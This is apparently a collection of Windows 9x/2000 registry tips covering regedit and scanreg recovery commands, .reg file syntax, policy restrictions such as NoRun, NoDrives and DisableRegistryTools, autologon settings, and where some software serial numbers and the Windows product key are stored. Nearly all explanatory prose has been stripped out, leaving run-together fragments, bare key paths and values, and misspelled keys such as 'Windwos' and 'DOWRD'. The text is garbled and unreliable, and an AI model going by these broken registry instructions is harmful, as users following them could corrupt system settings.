ji_1hex:01,01,07,00,00,00,16,7f,7f,77,00,00,63
12DOS
12DOS
WINDOWSWINDOWSDOS
scanreg/restore
DOS55scanreg.exe
DOSregedit.exe
scanreg/restoreregedit.exeedit
1
DOSRegedit[/L:system]
[/R:user]/Efilename[regpath1]/Lsystemsystem.dat/Ruseruser.dat?Eregpath1test.regregedit/etest.regHKEYLOCALMACHINE\Software\Microsoft\Windows\Current
Version\Run
2
DOSedit.reg6WINDOWS[HKEY_LOCAL_MACHINE][HKEYLOCALMACHINE\Enum\PCI]WINDOWS[HKEYLOCALMACHINE\Enum\PCI
\VEN_8086DEV7111SUBSYS_00000000REV01\BUS_00DEV_07FUNC01]Logconfig[HKEY_LOCALMACHINE\Enum
\PCI\VEN1002DEV4C42SUBSYS_4C421071REVDC000800]WINDOWS
[HKEYLOCALMACHINE\Software\Microsoft
\Windows\CurrentVersion]WINDOWS
[HKEYCLASSROOT][HKEYCURRENTUSER]WINDOWS
1WINDOWSC:\windows\sysbackup[HKEY_LOCAL_MACHINE]extract/erb000.cab.system.datuser.datregedit/L:system.dat/R:user.dat/ebackup.regHKEYLOCALMACHINE
3
regedit/L:system/R:userfile1.regfile2.regregeditfile1.reg
WINDOWSSCANDISKBOOTLOG.TXTscanreg/restoreregedit[HKEYLOCALMACHINE\Enum\PCI]regedit/ehdc.regHKEYLOCALMACHINE\Enum\PCIEDIT"ChannelOptions"=hex:00IDEhex:02regedithdc.reg
DOS
13DOS
windows98windowsscanregw.exewindowsScanreg.exedosScanreginiForwindowsdosScanreg.exe
doswindowsScanregScanreg?
Scanreg/backup
Scanreg/restorescanreg.inirestore
Scanreg/fixP166MMX18732
Scanreg/commentcabcabScanreg/restore
windowsdos
14DOS
Windows95/98DOSWindows95/98RegEditScanReg
DOS
Regedit.exe,DOS,Windows95/98WindowsRegedit,&127;DOS?
DOSRegedit,
:
Regedit[/L:system][/R:user]filename1
Regedit[/L:system][/R:user]/Cfilename2
Regedit[/L:system][/R:user]/Efilename3[regpath]
:
/L:systemsystem.dat
/L:useruser.dat
filename1
/Cfilename2
/Efilename3
regpath()
regedit.exeDOS
1registryreg1.reg
regedit/Ereg1.reg
2reg1.regregistry()
regedit/Creg1.reg
3reg.dat()
regeditreg.dat
4CGJcgj.reg
regedit/Ecgj.regcgj
5system/datD:\PWINuser.datE:\PWIN,reg.datregistry
regedit/L:D:\PWIN/R:E:\PWIN/Creg.dat
Windows1RegEdit
1.
(1)StartingWindows95StartingWindows98F8Safemodecommandpromptonly
(2)
regedit/l:c:\windows\system.dat/ec:\system.txt
cd\windowsWindows95/98
attribshrsystem.datSYSTEM.DAT
rensystem.datsystem.oldSYSTEM.DAT
regedit/l:c:\windows\system.dat/cc:\system.txt
(3)Windows95/98
regedit/l:c:\windows\user.dat/ec:\user.txt
cd\windows
attribshruser.datUSER.DAT
renuser.datuser.oldUSER.DAT
regedit/l:c:\windows\user.dat/cc:\user.txt
2.Windows95/98
(1)
(2)
cd\windows
attribshrsystem.dat
rensystem.datsystem.bad
(3)Windows95system.datSystem.da0System.da0system.dat
3.
(1)
(2)
cd\windows
attribshrsystem.dat
rensystem.datsystem.***
cdattribshrsystem.1stC:\
copysystem.lstc:\windows\system.datsystem.lstsystem.dat
attribshrsystem.lst
4.Windows95Windows95/98
DOSScanReg
DOSScanReg/?ScanReg
ScanReg/[Option]
Option?BACKUPRESTOREFIXCOMMENT.CAB
:
1.DOSScanReg/BACKUP,.CAB
2.ScanReg/FIX
3.ScanReg/RESTORE
15Win9X
1
1System.datUser.dat
2Regedit.exe
3Win98Win98.cabrb00.cabWindows\SysbackupWindowsExtract.exeWindows\CommandWinZip7.0rb00.cab
2
WindowsRegedit.exeMaxMTU576MaxMSS536DefaultRcvWindows3216DefaultTTL641999
3Win9597
Win9597Win98ScanRegDOSScanReg.exeWindowsScanRegw.exeScanRegWindows\SysbackupWin98ScanRegWin9597Win98Windows\CommandScanReg.exeWindowsScanReg.iniScanRegw.exeWin9597Win9597ScanRegWin9597Win98
4
Reg2000RegmonRegcleanRegcleanRegcleanUndoRegcleanRegcleanFixErrorRegclean.regFixError
16WIN98
WIN98Windows
WindowsREGEDIT.EXEWin98
1.
2.MSDOS
3.WindowsWindowsC:\WindowsCDC:\WINDOWS
4.MSDOS
C:\WINDOWS\COMMAND\SCANREG\RESTORE
1.
2.
3.
1.
2.
1.
2.
3.
4.
1.
2.
3.DWORD
4.
17
Win95NTWindows
Win9X3
system.datuser.datconfig.polWindowssystem.datI/OIRQDMA
user.dat
config.polWin98system.datuser.dat
()
1
system.datuser.datDOSWindows
DOSWindowsAttribhrssystem.datuser.dat
Windowssystem.datuser.dat
2
Regedit.exe.reg
()
1
system.datuser.datDOSWindowsWindowsDOS
2
WindowsDOS
WindowsDOS
DOSRegedit.exeWindows
Regedit[/L:system][/R:user]filename1
Regedit[/L:system][/R:user]/Cfilename2
Regedit[/L:system][/R:user]/Efilename3regpath1
Regedit[/L:system][/R:user]/Dregpath2
/L:systemsystem.dat
/R:useruser.dat
filename1
/Cfilename2
/Efilename3
regpath1
/Dregpath2
1Regeditbak.reg
2Regedit/Cbak.regbak.reg
2Windows64smartdrv
Win95Win98
()Windows95
Win95Windowssystem.datuser.datsystem.da0user.da0system.da0user.da0system.datuser.dat4
system.da0user.da050system.da0user.da090
()Windows98
Win98system.datuser.datsystem.iniwin.iniWin95
Win98WindowsSysbckuprbXCABsystem.datuser.datsystem.iniwin.ini5X00000455555rbbad.cab
Win98WindowsWinzipCAB4DOSWindowsDOS
Windowsextract.exeWindowsextract/Y.Sysbckup\rbX.cabX000004
Windowsscanreg.exeDOSCreateBackupsViewBackupsRestoreRestart
scanreg.exe555
Windows
Win9XCsystem.1stDOSsystem.1stWindowssystem.datsystem.1stsystem.datsystem.dat
system.datuser.datWindows25
WindowsSetup10Win98()
18Windows2000
Windows2000Windows2000
Regedit.exe.regRegedit.exe16Windows2000Regedit.exeRegedit.exesystem32Regedt32.exe32
Regedt32reg
15Windows2000
?TXTWindows
Regedt32
[HKEY_USERS][HKEY_LOCAL_MACHINE]Regedt32.ChenNai.ChenNai
Windows2000Windows9XWindows2000DocumentsandSettingsNTUSER.DATNTUSER.INIntuser.dat.LOGWindows2000SYSTEM32\CONFIGDEFAULTSOFTWARESYSTEMAppEvent.EvtSecEvent.EvtSysEvent.Evt.LOG.SAVWindows2000Windows9Xsystem.datuser.dat
19Win98
WIN98
1regedit,;
2WIN98WIN98CABWINDOWSsysbckup->->->rb00x.cabWindowsCABEXTRACT.COMC\WINDOWS\COMMAND
windos98DOS,F8
commandpromptonly
cdc:\windows\sysbckup
EXTRACT/Erb00x.cabc:\windows*rb00x.cab
"y",
DOS
cdc:\widnows
regedit/CFILENAMEFILENAME,.reg
3WIN98
DOS
attrib-r-s-hsystem.1st
copysystem.1stc:\windows\system.dat
WIN98IE
WIN98
20
WindowsPCC:windowssystem.datuser.datWindows
1*.dll
2OLE
3Windows()
4
5
6
7
8WindowsMS-DOS
9Windows
10
regedit.exe/(backup)system.datuser.datDOS(F8CommandPromptOnly)regedit/cbackup.regWindowsDOSscanreg/restore
21
Windows95/98
1.
Windows95/98
SHELL32.DLL
Mprexe
Mprexe.exeMprexe.exeWindows95/98
Windows95/98
CannotfindadevicefilethatmaybeneededtorunWindowsorawindows
application.
TheWindowsRegistryorSystem.inifilereferstothisdevicefile,
butthedevicefilenolongerexists
Ifyoudeletedthisfileonpurpose,tryuninsallingtheassociated
applicationusingitsuninstall
OrSetupprogram.
Ifyoustillwanttousetheapplicationassociatedwiththisdevicefile,
Tryreinstallingtheapplicationtoreplacethemissingfile.
Ndskwan.vxd
Pressakeytocontinue.
2.
1.
Windows95/98
(1)
Beta
(2)
PC
(3)
1632Windows95/98
(4)
(5)
2.
(1)
CIHBIOSBIOSCacheCMOSCMOS
(2)
(3)CPU
CPUCPUCPUAMDCyrixIBMWinChip
(4)
3.
()
22reg
infvbs.reg
(Subkey)
(http://www.sometips.com/tips/registryhack/29.htm)
WindowsRegistryEditorVersion5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Test4Adam]
HKEY_LOCAL_MACHINE\SOFTWARE\Test4Adam
WindowsRegistryEditorVersion5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Test4Adam]
"Test1"="Adam"
"Test2"=hex:61
"Test3"=dword:00000064
Test1Stringvalue
Test2Binaryvalue
Test3DWORDvalue
Test4Adam
WindowsRegistryEditorVersion5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Test4Adam]
"Test1"=-
HKEY_LOCAL_MACHINE\SOFTWARE\Test4Adam"Test1"
WindowsRegistryEditorVersion5.00
[-HKEY_LOCAL_MACHINE\SOFTWARE\Test4Adam]
HKEY_LOCAL_MACHINE\SOFTWARE\Test4Adam.reg
23Win9X
1[HKEY_USERS\\Software\Microsoft\Windows\CurrenVersion\Policies\System].DefaultDWORD
NoDispAppearancePage=1()
NoDispBackgroundPage=1
NoDispCPL=1
NoDispScrSavPage=1
2[HKEY_USERS\\Software\Microsoft\Windows
\CurrentVersion\Policies\Network]DWORD
NoNetSetup=1
NoNetSetupIDPage=1
NoNetSetupSecurityPage=1
3[HKEY_USERS\\Software\Microsoft\Windows
\CurrentVersion\Policies\System]DWORD
NoSecCPL=1
NoPwdPage=1
NoAdminPage=1
NoProfilePage=1
NoDevMgrPage=1
NoConfigPage=1
NoFileSysPage=1
NoVirtMemPage=1
[HKEY_USERS\\Software\Microsoft\Windows
\CurrentVersion\Policies\Explorer]DWORDNoRun=1
DWORDNoSetFolders=1\
DWORDNoSetTaskbar=1\
DWORDNoFind=1DWORDNoStartMenuSubFolders=1
DWORDNoClose=1
1[HKEY_USERS\\Software\Microsoft
\Windows\CurrentVersion\Policies\Explorer]DWORDNoDrives=1
DWORDNoNetHooD=1
DWORDNoEntioeNetwork=1
NoWorkgroupContents=1
DWORDNoDesktop=1
DWORDNoSaveSettings=1
2[HKEY_LOCAL_MACHINE
\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Network]DWORD
NoDialIn=1
NoFileSharing=1
3.Windows
[HKEY_USERS\\Software\Microsoft\Windows
\CurrentVersion\Policies\Explorer]
RestrictRunWindows
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
\CurrentVersion\Policies\Network]DWORD
HideSharePwds=1
DisablePwdCaching=1
AlphanumPwds=1Windows
MinPwdLen=nWindowsn08
[HKEY_USERS\\Software\Microsoft\Windows
\CurrentVersion\Policies\System\]DWORDDisableRegstryTools=1
MSDOSMSDOS
[HKEY_USERS\\Software\Microsoft\Windows
\CurrentVersion\Policies\System]WinOldAppDWORDDisabled=1MSDOSWinOldAppDWORDNoRealMode=1MSDOS
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
\CurrentVersion\RunOnce]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
\CurrentVersion\RunServices]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
\CurrentVersion\RunServicesOnce]
DWORD10DWORDDWORD
24
24
:
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows
/CurrentVersion/Network/RealModeNetautologon01 00 00 00 00
CD-ROM:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CDRomDWORDAutorun01.
:
CTRL+ALT+DELHKEY_USERS\.DEFAULT\Control
Panel\desktopAutoEndTasks"1".
:
HKEY_USERS\.DEFAULT\Control Panel\desktopCursorBlinkRate-1
:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\UpdateUpdateMode00
00 00 00
:
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerNoDriveTypeAutoRun95
00 00 00,"b5 00 00 00"
:
HKEY_CLASSES_ROOT\AudioCD\shell.
:
HKEY_CURRENT_USER\Software\Microsoft\WindowsCurrentVersion\Policies\ExplorerDWORDNoSetTaskBar1."
:
HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetricsShell Icon
Size32
:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell
Icons29:%WINDIR%\SYSTEM\docprop.dll,1
:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Shell
Icons"29",.
WINDOWS:
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsCurrentVersionRegisteredOwner
FLASHSN:
HKEY_LOCAL_MACHINE\Software\Macromedia\Flash\4Registration\Serial
Number ,FLASH.
:
HKEY_USERS\.DEFAULT\Software\Microsoft\WindowsCurrentVersion\Applets\Hearts"zb""42"
:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\ControlFileSystem64MB0F00000PathCache32MB00800064MB0F0000"NameCache",NameCache32MB800000.
:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServicesClass\fdc\0000ForceFIFO0".
:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\FileSystemDWORD
ConfigFileAllocSize1f4
:
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/
CurrentVersion/Network/RealModeNetautologon01 00 00 00 00
HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\DIRECTORY\SHELL"",""""
HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\DIRECTORY\SHELL\,"COMMAND""C:\WINDOWS\RUNDLL.EXE
USER.EXE,EXITWINDOWS"
HKEY_LOCAL_MACHINE\Software\CLASSES\Directory\shell
HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\DIRECTORY\SHELL\,"COMMAND""C:\WINDOWS\RUNDLL.EXE
USER.EXE,EXITWINDOWSEXEC"
Ctrl+Space,HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard
Layouts
E00E0804
E0040804
E0050804
E0010804
00000409
E0030804
E0020804
HKEY_USERS\.DEFAULT\keyboard
layout\preload1,2,3,4......1,2,3,4.....,1,2,3,4....,,
HKEY_USERS\.DEFAULT\Software\Microsoft\WindowsCurrentVersionABCDWORD01
DOS
HKEY_CLASSES_ROOT\Directory\shellCommandPromptCommandcommandcommand.com
/k cd "%1"
HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder"Attributes","70
01 00 20"
HKEY_LOCAL_MACHINE\Software\CLASSES\Directory\shell NewWindow
,NewWindowcommandcommand,explorer.exe %1"
HKEY_LOCAL_MACHINE\SoftwareMicrosoft\Windows\CurrentVersion\explorer\AdvancedStartMenuScrollProgramsfalse
"""windows"
HKEY_USERS\.DEFAULT\Software\Microsoft\WindowsCurrentVersion\Policies\ExplorerNoWindowsUpdate1
HKEY_USERS\.DEFAULT\Software\Microsoft\WindowsCurrentVersion\Policies\ExplorerDWORDNoChangeStartMenu1
HKEY_CURRENT_USER\Control Panel\Desktop
DoubleClickHeightDoubleClickWidth
HKEY_CURRENT_USER\Control Panel\DesktopMenuShowDelay0-9990
HKEY_CURRENT_USERControl Panel\DesktopMinAnimate01
HKEY_USERS\.DEFAULT\Software\Microsoft\WindowsCurrentVersion\Policies\ExplorerDWORDNoClose1
WINDOWS
HKEY_CURRENT_USER\Control Panel\DesktopSmoothScroll01
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerDWORDNoFind1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerDWORDNoRecentDocsMenu1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerDWORDNoRun1
.{2227A280-3AEA-1069-A2DE-08002B30309D}
.{21EC2020-3AEA-1069-A2DD-08002B30309D}
.{20D04FE0-3AEA-1069-A2D8-08002B30309D}
.{645FF040-5081-101B-9F08-00AA002F954E}
HKEY_CURRENT_USER\Software\Microsoft\Windwos\CurrnetVersion\Ploicies\ExplorerNoLogOff01
00 00 00
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerDWORDNoRecentDocsHistory1
HKEY_CURRENT_USER\Software\Microsoft\WindowsCurrentVersion\Policies\SystemDWORDNoDispCPL1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\SystemDWORDNoDispScrSavPage1
web
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\SystemDWORDNoDispSettingsPage1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ExploreDWORDNoChangeStartMenu1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\SystemDWORDNoFileSysPage1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\SystemDWORDNoVirtMemPage1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\SystemDWORDNoDevMgrPage1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\SystemDWORDNoConfigPage1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerDWORDNoAddPrinter1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerDWORDNoDeletePrinter1
//
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsCurrentVersion\Uninstall/
""""
HKEY_USERS\.DEFAULT\Software\Microsoft\WindowsCurrentVersion\Policies\ExplorerDWORDNoNetSetup",1
HKEY_USERS\.DEFAULT\Software\Microsoft\WindowsCurrentVersion\Policies\NetworkDWORDNoNetSetupIDPage,1
HKEY_USERS\.DEFAULT\Software\Microsoft\WindowsCurrentVersion\Policies\NetworkDWORDNoEntireNetwork,1
WEB
HKEY_CLASSES_ROOT\CLSID{BDEADF00-C265-11d0-BCED-00A0C90AB50F}InfoTip
HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID{85BBD920-42A0-1069-A2E4-08002B30309D}InfoTip
HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID{D6277990-4C6A-11CF-8D87-00AA0060F5BF}InfoTip
HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID{992CFFA0-F557-101A-88EC-00DD010CCC48}InfoTip
HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID{208D2C60-3AEA-1069-A2D7-08002B30309D}InfoTip
HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID{450D8FBA-AD25-11D0-98A8-0800361B1103}InfoTip
HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID{645FF040-5081-101B-9F08-00AA002F954E}
InfoTip
HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}InfoTip
HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID{645FF040-5081-101B-9F08-00AA002F954E}InfoTip
IE
HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID{871C5380-42A0-1069-A2EA-08002B30309D}InfoTipINTERNET
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User
Shell Folders"Programs", C:\down
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User
Shell Folders"Start Menu", C:\tt
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User
Shell Folders"AppData", C:\tt
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User
Shell Folders
"Fonts", C:\tt
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User
Shell Folders"SendTo", C:\tt
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion"CommonFilesDir",
C:\tt
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User
Shell Folders"Startup", C:\WIN98\Start Menu\Programs\,
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User
Shell Folders "History", C:\tt
""
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User
Shell Folders"Personal", C:\tt
5
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsCurrentVersion\explorer\Shell
Icons"5",
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsCurrentVersion\explorer\Shell
Icons "5",
""
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsCurrentVersion\explorer\Shell
Icons"44",
""
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsCurrentVersion\explorer\Shell
Icons"24",.
""
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsCurrentVersion\explorer\Shell
Icons"27",
""
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsCurrentVersion\explorer\Shell
Icons"43",
""
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsCurrentVersion\explorer\Shell
Icons"22",
""""
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsCurrentVersion\explorer\Shell
Icons"19",
Internet Explorer
HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID{871C5380-42A0-1069-A2EA-08002B30309D}\DefaultIcon()C:\w.ico,0
""
HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID{85BBD920-42A0-1069-A2E4-08002B30309D}\DefaultIcon()
HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID{D6277990-4C6A-11CF-8D87-00AA0060F5BF}\DefaultIcon()
HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID{00020D75-0000-0000-C000-000000000046}\DefaultIcon()
HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID{21EC2020-3AEA-1069-A2DD-08002B30309D}().:HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID\{21EC2020-3AEA-1069-A2DD-08002B30309D}\DefaultIcon,()
HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID{2227A280-3AEA-1069-A2DE-08002B30309D}\DefaultIcon()
HKEY_CLASSES_ROOT\CLSID{645FF040-5081-101B-9F08-00AA002F954E}
HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon
HKEY_CLASSES_ROOT\CLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}HKEY_CLASSES_ROOT\CLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon
HKEY_CLASSES_ROOT\CLSID{450D8FBA-AD25-11D0-98A8-0800361B1103}\DefaultIcon
DREAMWEAVER3SN
DREAMWEAVER?,DREAMWEAVER3SN
HKEY_LOCAL_MACHINESoftware\Macromedia\Dreamweaver\3\Registration
,"Serial Number",DREAMWEAVER
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRUa,b,c,d.....
HKEY_USERS\.DEFAULT\Control Panel\desktopCursorBlinkRate-1
HKEY_USERS\.DEFAULT\Software\Microsoft\WindowsCurrentVersion\Explorer\Doc
Find Spec MRU
Win98
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsCurrentVersion\WinlogonLegalNoticeCaption=LegalNoticeText=
WINDOWS98
HKEY_LOCAL_MACHINE\Network\LogonDOWRD"MustBeValidated"1WINDOWS98ESC
HKEY_LOCAL_MACHINE\Network\LogonDOWRDUserProfiles1
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsCurrentVersion\WinlogonAutoAdminLogon1DefaultPasswordDefaultUserName
HKEY_USERS\.DEFAULT\Control Panel\desktopUserPreferencemaskAF 00
00 00
WIN98
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersionProductKey
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsCurrentVersion\RUN
IE
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet
Explorer\Control PanelDWORDLanguages1
IEINTERNET
HKEY_CURRENT_USER\Software\Microsoft\WindowsCurrentVersion\Policies\ExplorerNoFolderOptions01
00 00 00
HKEY_CURRENT_USER\Software\Microsoft\WindowsCurrentVersion\Policies\ExplorerNoViewContextMenu01
00 00 00WINDOWS
inf
HKEY_LOCAL_MACHINE\Software\CLASSES\.inftxtfile
reg
HKEY_LOCAL_MACHINE\Software\CLASSES\.regtxtfile
HKEY_CURRENT_USER\Software\Microsoft\WindowsCurrentVersion\Policies\ExplorerDOWRD"NoChangeStartMenu",1
WINDOWS
HKEY_CURRENT_USER\Software\Microsoft\WindowsCurrentVersion\Policies\Explorer"ClearRecentDocsonExit","01
00 00 00"
ESC
HKEY_LOCAL_MACHINE\Network\LogonDOWRDMustBeValidated1,Windows
regedit.exe
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\SystemDOWRD"DisableRegistryTools"1
regedit.exe
regedit.exe
HKEY_CURRENT_USER\Software\Microsoft
\Windows\CurrentVersion\Policies\Explorer
DWORDNoDrivesFFFFFFFF
EHKEY_CURRENT_USER\Software\MicrosoftWindows\CurrentVersion\Policies\Explorer
DWORDNoDrives10
DHKEY_CURRENT_USER\Software\MicrosoftWindows\CurrentVersion\Policies\Explorer
DWORDNoDrives8
C
HKEY_CURRENT_USER\Software\MicrosoftWindows\CurrentVersion\Policies\Explorer
DWORDNoDrives4
A
HKEY_CURRENT_USER\Software\MicrosoftWindows\CurrentVersion\Policies\Explorer
DWORDNoDrives1
MS-DOS
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerDWORDNoRealMode1
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\MyComputer\NameSpace{992CFFA0-F557-101A-88EC-00DD010CCC48}""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerNoStartBanner01
00 00 00
IE
HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\TypedURLs
,HKEY_LOCAL_MACHINE\Config\0001\Software\Microsoftwindows\CurrentVersion\Internet
SettingsProxyEnable"00 00 00 00"
outlook express
HKEY_USERS\.DEFAULT\Software\Microsoft\Outlook
ExpressWindowTitle
HKEY_CURRENT_USER\Software\Microsoft\Internet
ExplorerSettingsAnchor ColorAnchor Color Visited
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsCurrentVersion\explorer\NetworkNeighborhoodNameSpaceHKEY_USERS\.DEFAULT\Software\Microsoft
\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu\
HKEY_USERS\.DEFAULT\Software\Microsoft\WindowsCurrentVersion\Policies\NetworkDWORDNoNetSetupIDPage,1
HKEY_USERS\.DEFAULT\Software\Microsoft\InternetExplorer
DWORDDownload Directory,,C:\My Documents
Cookies
HKEY_USERS\.DEFAULT\Software\Microsoft\WindowsCurrentVersion\Explorer\User
Shell FoldersFavorites,,C:\WINDOWS\FavoriteCookies
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsCurrentVersion\Winlogon"DontDisplayLastUserName","1"
25
1
HKEY_CURRENT_USER\Control Panel\Desktop
Menushowdelay
Menushowdelay0
2
HKEY_CURRENT_USER\Software\Microsoft\WindowsCurrentVersion\Policies\ExplorerNoClose
10
3
HKEY_LOCAL_MACHINE\System\Currentcontrolset\Control
\UpdateUpdateMode 01
UpdateMode0
UpdateMode1
F5
4
HKEY_CURRENT_USER\Software\Microsoft\WindowsCurrentVersion\Policies\ExplorerNoSetFolders
10
HKEY_CURRENT_USER\Software\Microsoft\WindowsCurrentVersion\Policies\ExplorerNoSetTaskbar
10
5
HKEY_CURRENT_USER\Software\Microsoft\WindowsCurrentVersion\Policies\ExplorerNoCommonGroups
10
6
HKEY_CURRENT_USER\Software\Microsoft\WindowsCurrentVersion\Policies\ExplorerNoRecentDocsMenu
10
7
HKEY_CURRENT_USER\Software\Microsoft\WindowsCurrentVersion\Policies\Explorer
ClearRecentDocsonExit
10
8
HKEY_CURRENT_USER\Software\Microsoft\WindowsCurrentVersion\Policies\ExplorerNoFind
10
9
HKEY_CURRENT_USER\Software\Microsoft\WindowsCurrentVersion\Policies\Explorer
NoRecentDocsHistory
10
10
HKEY_CURRENT_USER\Software\Microsoft\WindowsCurrentVersion\Policies\ExplorerNoRun
10
11
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsCurrentVersion\Run
Registry Machine Run
12
HKEY_CURRENT_USER\Software\Microsoft\WindowsCurrentVersion\Policies\ExplorerNoLogOff
10
13
Wave Sound shellnew
HKEY_LOCAL_MACHINEHKEY_LOCAL_ROOTshellnew
14
HKEY_CURRENT_USER\Control Panel\Appearance\Schemes
Windows
15
Windows
HKEY_CLASSES_ROOT\CLSID{645FF040-5081-101B-9F08-00AA002F954E}
{645FF040-5081-101B-9F08-00AA002F954E}+DefaultIcon
FullEmpty
Shell32.dll313132 C:\Windows\SystemShell32.dll,31
C:\Windows\help.ico
16
Internet Explorer
HKEY_LOCAL_
MACHINE\SOFTWARE\Microsoft\WindowsCurrentVersion\Explorer\Desktop\NameSpace
17
HKEY_CURRENT_USER\Software\Microsoft
\Windows\CurrentVersion \Policies\Explorer
NoDesktop
01
Active desktop
18
HKEY_CURRENT_USER\Software\Microsoft\WindowsCurrentVersion\Policies\ExplorerNoNetHood
10
19
HKEY_CURRENT_USER\Control Panel\desktop
PaintDesktopVersion 01
Windows
20
HKEY_CURRENT_USER\Software\Microsoft\WindowsCurrentVersion\Policies\ExplorerNoDrives
2NABCD2N
A: 1, B: 2,C: 4, D: 8, E: 16, F: 32, G: 64,H: 128, I: 256,J:
512,K: 1024, L: 2048, M: 4096, N: 8192,O: 16384,
P: 32768, Q:65536,R: 131072,S: 262144,T: 524288, U: 1048576, V:
2097152, W:4194304,X: 8388608, Y: 16777216, Z: 33554432
ABC77=1+2+467108863
21
HKEY_CLASSES_ROOT\CLSID{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder
Attributes 40 01 00 2070 01 00 20
